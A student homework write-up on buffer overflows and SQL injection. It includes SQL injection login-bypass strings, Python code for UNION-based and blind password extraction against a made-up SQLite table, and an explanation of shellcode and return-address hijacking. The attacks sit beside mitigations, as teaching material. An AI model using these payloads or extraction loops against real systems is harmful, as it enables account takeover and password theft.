Security Vulnerabilities: Buffer Overflows and SQL Injection


Added on 2020/05/03

Homework Assignment
1. LOW LEVEL EXPLOITS
1. Set the character's gold or health to a number greater than 9000 by utilizing a buffer
overflow. How did you achieve this? Explain using reference to bytes and ASCII as to what
the exact value was that you achieved. [4 marks]
I used Python to create an executable exploit script called "overf" containing:
#!/usr/bin/python
print("G" * 1000)
The script prints a thousand "G" characters. I then redirected its output into a file called
"e1" with ./overf > e1; ls -l e1 reports 1001 bytes, the 1000 "G" characters plus the trailing
newline that print adds. To overflow the name buffer in a.out, the script's output is piped
straight into the name prompt: ./overf | ./a.out. The terminal reports a segmentation fault, and
the game prints Gold: 1094795585 while Hp stays at Hp: 30.
In terms of bytes: the name is stored in a fixed-size char array and the game reads into it
without checking the length, so the characters that do not fit continue into the memory that
follows the array, where gold is stored. gold is a 4-byte integer, so its new value is simply
the four bytes that overran the array, read as a little-endian number. The reported 1094795585
is 0x41414141, four bytes of 0x41, which is ASCII 'A' rather than 'G'; a run of 'G' (0x47)
would set gold to 0x47474747 = 1195853639. Either value is far above 9000. Hp stays at 30
because it is not stored directly after the name, and the rest of the 1000 bytes continue past
the record into the stack, which is what produces the segmentation fault.
2. How could this exploit be prevented? [2 marks]
Use only length-bounded input and copy functions. gets, scanf with a bare %s, strcpy and
sprintf do not know how large the destination is; fgets, snprintf and an explicit check of
strlen(input) against sizeof(buffer) do. Rejecting (or truncating) a name that does not fit is
what actually stops the gold overwrite.
Compile with GCC's stack protector (-fstack-protector or -fstack-protector-strong, the
successor to StackGuard). It places a canary in front of the saved return address and aborts
the program when the canary is overwritten, which stops the overflow from being turned into
code execution. It does not stop data fields that sit between the buffer and the canary, such
as gold here, from being corrupted, so it complements the bounds check rather than replacing it.
Test for overflows before release: compile with AddressSanitizer (-fsanitize=address) and
fuzz the name input with long strings, which turns a silent overwrite into an immediate report
of the out-of-bounds write.
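As an added example (not part of the original submission or the game's own code), the following Python models the savegame record as a byte array to show exactly which bytes end up in gold, and places the bounded copy from question 2 beside the unchecked copy from question 1. The layout (hp, then a 16-byte name, then gold, little-endian) is an assumption chosen so that an over-long name reaches gold but not hp, as observed above; a.out's real layout is not known from the page, and the function names are mine.

```python
import struct

# Assumed record layout for the savegame (the page does not show a.out's real one):
# hp (uint32), then a 16-byte name, then gold (uint32), little-endian as on x86.
# With this order a name that is too long runs into gold but not hp, which matches
# the observed "Gold: 1094795585 ... Hp: 30".
RECORD_FMT = "<I16sI"
NAME_OFF = 4
NAME_LEN = 16
RECORD_LEN = struct.calcsize(RECORD_FMT)   # 24 bytes


def make_record(hp, name, gold):
    """Pack the three fields the way they sit next to each other in memory."""
    return bytearray(struct.pack(RECORD_FMT, hp, name, gold))


def read_record(record):
    """Interpret the bytes again, as the game does when it prints the stats."""
    hp, name, gold = struct.unpack(RECORD_FMT, bytes(record))
    return {"hp": hp, "name": name.split(b"\0", 1)[0], "gold": gold}


def write_name_unchecked(record, data):
    """Model of gets()/strcpy() into name: copy up to and including the first NUL
    with no length check, so byte 17 onward lands in whatever follows the name.
    Returns the number of bytes that ran past the end of the record; in the real
    process those keep overwriting the stack, which is where the segfault comes from."""
    payload = data.split(b"\0", 1)[0] + b"\0"
    room = len(record) - NAME_OFF
    n = min(len(payload), room)
    record[NAME_OFF:NAME_OFF + n] = payload[:n]
    return len(payload) - n


def write_name_checked(record, data):
    """The fix: refuse any name that does not fit in the field together with its NUL."""
    payload = data.split(b"\0", 1)[0]
    if len(payload) >= NAME_LEN:
        raise ValueError("name longer than %d bytes" % (NAME_LEN - 1))
    record[NAME_OFF:NAME_OFF + NAME_LEN] = payload.ljust(NAME_LEN, b"\0")


def run_exploit(ch, count=1000):
    """Replay the attack: feed a run of one ASCII byte as the name."""
    rec = make_record(hp=30, name=b"hero", gold=100)
    spilled = write_name_unchecked(rec, ch * count)
    out = read_record(rec)
    out["spilled"] = spilled
    return out


def checked_copy_rejects(ch, count=1000):
    """Same input against the bounded copy: nothing is written and gold is intact."""
    rec = make_record(hp=30, name=b"hero", gold=100)
    try:
        write_name_checked(rec, ch * count)
    except ValueError:
        return read_record(rec)["gold"] == 100
    return False


def gold_bytes(value):
    """The four bytes behind a gold value, so the ASCII behind the number is visible."""
    return struct.pack("<I", value)


if __name__ == "__main__":
    for ch in (b"G", b"A"):
        r = run_exploit(ch)
        print("%r run: Gold: %d (0x%08x = %r)  Hp: %d  bytes past record: %d"
              % (ch, r["gold"], r["gold"], gold_bytes(r["gold"]), r["hp"], r["spilled"]))
    print("bounded copy rejects the input:", checked_copy_rejects(b"G"))
```

Running it shows the 'G' run producing 0x47474747 and the 'A' run producing 1094795585, the value reported above, while hp is untouched and most of the 1000 bytes spill past the record; the same input against write_name_checked is refused before anything is written.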
3. Could this exploit be useful for more than just the game? Could it be used to gain access to
a system? If not, why not? If so, where might it be used? [4 marks]
Yes. The same bug in any C or C++ program that reads attacker-controlled input into a fixed-size
buffer can be exploited, and the payoff depends on the privileges of the process. If the
vulnerable program runs as root (a setuid binary or a network daemon, for instance), the
attacker overwrites the saved return address instead of a game variable and points it at
shellcode carried in the same input; when the function returns, the shellcode runs with the
program's privileges and spawns a root shell, from which the attacker can read sensitive files,
modify or delete data, install persistence and move on to other hosts. Because so much
long-lived C code sits in infrastructure, this class of flaw has been used against network
services, file-format parsers, embedded and industrial control systems such as those in power
grids and manufacturing plants, medical devices and vehicle electronics, where the consequences
go beyond data loss to physical harm.
2. GENERAL QUESTIONS
1.1 Why is it necessary for us to provide the flag -fno-stack-protector to GCC? What is a
canary in terms of a buffer overflow and how can a canary prevent a buffer overflow exploit?
[4 marks]
Modern GCC builds on most Linux distributions enable the stack protector by default (Ubuntu's
compiler defaults to -fstack-protector-strong). Passing -fno-stack-protector switches it off,
so the function's frame is laid out without a canary and the overflow can reach the saved frame
pointer and return address undetected; with the protector on, the game would abort with
"*** stack smashing detected ***" instead of showing the altered values.
A canary is a guard value that the compiler places on the stack between the local buffers and
the saved return address in the function prologue. Its value is random, chosen once per process
(glibc keeps the reference copy in thread-local storage, at %fs:0x28 on x86-64). In the
epilogue, before the return address is used, the function compares the canary on the stack with
the reference copy; if they differ, something has written past a buffer, and __stack_chk_fail
is called to abort the process. Because a linear overflow must pass through the canary to reach
the return address, the corruption is detected before the hijacked return address is ever used.
Note what the canary does and does not do: it detects the overflow rather than preventing it;
it protects the return address and saved frame pointer but not other variables or fields that
sit between the buffer and the canary; and it can be bypassed if the attacker can leak the
canary's value (through a format-string bug, say) or reach the return address without writing
through the canary.
2. If the game above was written in Java instead of C, would the savegame still be exploitable?
[2 marks]
No, not in this form. Java arrays, and the strings built on them, are bounds-checked by the JVM
on every access: writing past the end of the name array throws ArrayIndexOutOfBoundsException
instead of silently overwriting the neighbouring gold field, so there is no way for extra
characters to spill into another variable. The only route to a real memory-corruption bug from
Java is native code called through JNI, which runs outside the JVM's checks. A save file could
still be tampered with if the loader trusts the numbers it reads, but that is an
input-validation problem, not an overflow.
3. Imagine you were exploiting a program that was running with escalated privileges (i.e.
could read sensitive files, modify other users' settings and so on). Is it possible to obtain a
BASH shell using buffer overflows? Be sure to explain what shellcode is and how the shellcode is
executed.
[5 marks]
Yes. Shellcode is a short sequence of raw machine-code bytes, written so that it runs correctly
wherever it lands in memory (no absolute addresses, and usually no NUL bytes so that string
functions copy it whole); the classic payload makes the execve system call with "/bin/sh" so
that the process is replaced by a shell. It is executed by overflowing the buffer with an input
that contains, in order, the shellcode itself (often preceded by a NOP sled to make the landing
address forgiving), padding up to the saved return address, and then the address of the sled or
shellcode in place of the real return address. When the vulnerable function returns, the CPU
loads the overwritten return address and starts executing the attacker's bytes; the new shell
inherits the privileges of the exploited process, so a root-owned program yields a root shell.
On current systems the stack is usually non-executable and randomised, so injected shellcode no
longer runs directly and the return address is instead pointed at existing code (return-to-libc
or ROP chains that end in execve); the principle of replacing the return address is unchanged.
2. SQL EXPLOITS
1. Show how it is possible to log in as any user by performing an SQL injection attack on the
username/password login page. [2 marks]
Yes. The login query pastes the submitted username and password into the SQL text inside
single quotes, so a single quote in the input closes the string literal and whatever follows is
parsed as SQL. Any of the following inputs log in:
Username: ' OR '1'='1' /*
Password: ' OR '1'='1' /*
Username: ' OR '1'='1' --
Password: ' OR '1'='1'
The quote ends the username literal, OR '1'='1' makes the WHERE clause true for every row, and
-- or /* comments out the rest of the statement including the password check (SQLite treats an
unterminated /* comment as running to the end of the query). The query then matches every user
and the application accepts the first row returned. To pick a particular account rather than
the first one, use that account's name followed by a quote and a comment sequence, with any
password.
2. The website has been clued in on their major security problem and prevented the previous
attack. Is it possible to use the status query to work out the password of one of the
administrators, Bobby? [4 marks]
Stacking a second statement after a semicolon does not work: sqlite3 refuses to run more than
one statement per execute call, and the injection attempt against
cur.execute("SELECT status FROM Users WHERE username = '%s'" % username) raises
sqlite3.Warning: You can only execute one statement at a time. That only rules out stacked
queries, though. The status query still builds its SQL with %s, so the password can be
recovered with a single statement: appending a UNION SELECT of the password column to the
username makes the status page print the password where a status would appear, and even if the
page only revealed whether a row came back, a condition on substr(password, ...) in the
username would leak the password one character at a time by observing which guesses return a
row. So yes, it is possible.
3. How can these attacks be prevented? Is it a difficult security problem to fix? Why is it so
common? [4 marks]
The fix is to stop building SQL by string formatting: pass user input as bound parameters (the
? placeholders that sqlite3 supports), or go through a query builder or ORM that does so, so
that the database receives the query structure and the values separately and a quote in the
input can never alter the statement. Input validation (length limits, allowed characters) and a
least-privilege database account limit the damage but are defence in depth, not a replacement
for parameterisation. Testing should include the obvious probes in every field: a lone single
quote, OR '1'='1', and comment sequences.
It is not a difficult problem to fix, and the fix is mechanical once the vulnerable queries are
found. It remains common because string formatting is the most obvious way to build a query,
many tutorials and legacy code bases still do it, the code works perfectly on ordinary input so
nothing flags it in normal testing, and dependencies and frameworks are often left unpatched
after deployment. Code review and static analysis that flag any query built from a formatted
string catch the pattern cheaply.
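As an added example, not taken from the site or the assignment, the following Python reproduces the three SQL questions against a constructed in-memory SQLite database: the login bypass, the refused stacked query, the single-statement UNION and blind extraction of the administrator's password through the status query, and the parameterised versions of both queries. The table contents, the alphabet used for guessing and the function names are made up for the demonstration; the only line taken from the page is the status query itself.

```python
import sqlite3
import string

# Constructed users table standing in for the site's; names, passwords and
# statuses are made up for the example.
USERS = [("alice", "hunter2", "user"), ("bobby", "s3cret!", "admin")]
# Characters tried by the blind extraction; wide enough to cover the demo password.
ALPHABET = string.ascii_letters + string.digits + "!@#$%^&*"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (username TEXT, password TEXT, status TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)", USERS)
    return conn


DEMO_DB = make_db()   # one in-memory database shared by the functions below


def login_vulnerable(conn, username, password):
    """Login the way the page describes it: values pasted into the SQL text."""
    sql = ("SELECT username FROM Users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def status_vulnerable(conn, username):
    """The status query exactly as quoted on the page (string formatting)."""
    cur = conn.execute("SELECT status FROM Users WHERE username = '%s'" % username)
    return [r[0] for r in cur.fetchall()]


def stacked_query_blocked(conn):
    """The attempt from question 2: a second statement after ';'. sqlite3 refuses
    it (sqlite3.Warning on older Pythons, ProgrammingError on newer ones)."""
    try:
        status_vulnerable(conn, "bobby'; SELECT password FROM Users; --")
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        return True
    return False


def leak_password_union(conn, target):
    """One statement is enough: UNION a SELECT of the password onto the status
    query, so the password comes back where a status would be displayed."""
    payload = "x' UNION SELECT password FROM Users WHERE username = '%s' --" % target
    rows = status_vulnerable(conn, payload)
    return rows[0] if rows else None


def leak_password_blind(conn, target, max_len=64):
    """If only 'row / no row' were visible, a boolean condition inside the single
    statement still reveals the password one character at a time."""
    found = ""
    while len(found) < max_len:
        for c in ALPHABET:
            guess = found + c
            payload = "%s' AND substr(password, 1, %d) = '%s" % (target, len(guess), guess)
            if status_vulnerable(conn, payload):
                found = guess
                break
        else:
            break   # no character extends the prefix: the whole password is known
    return found


def login_safe(conn, username, password):
    """Fix: bind the values with ? placeholders; they can never alter the statement."""
    row = conn.execute(
        "SELECT username FROM Users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


def status_safe(conn, username):
    """The status query with the username bound instead of formatted in."""
    cur = conn.execute("SELECT status FROM Users WHERE username = ?", (username,))
    return [r[0] for r in cur.fetchall()]


if __name__ == "__main__":
    db = DEMO_DB
    print("bypass logs in as:", login_vulnerable(db, "' OR '1'='1' --", "x"))
    print("stacked query blocked:", stacked_query_blocked(db))
    print("union leak:", leak_password_union(db, "bobby"))
    print("blind leak:", leak_password_blind(db, "bobby"))
    print("safe login with bypass input:", login_safe(db, "' OR '1'='1' --", "x"))
```

The blind loop is the fallback that matters in practice: it needs nothing but the true/false difference between a status row appearing or not, which is why removing error messages or output columns does not close the hole; only binding the value does.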